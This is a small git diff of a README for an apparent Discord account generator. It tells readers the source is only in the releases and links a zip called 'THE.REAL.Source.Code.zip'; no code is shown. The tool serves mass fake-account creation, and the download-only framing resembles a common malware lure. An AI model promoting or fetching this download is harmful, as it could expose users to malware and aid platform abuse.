Kolhax/Discord-acc-gen-v1/Readme.md

 # Discord-acc-gen-v1
-due of little problems, we could not upload source, </br>
+due of little problems, we could not upload source, on the branch. </br>
+(source are in releases) </br>
 look at [releases](https://github.com/Kolhax/Discord-acc-gen-v1/releases/tag/release) to [Download](https://github.com/Kolhax/Discord-acc-gen-v1/releases/download/release/THE.REAL.Source.Code.zip) it
 </br>
 </br>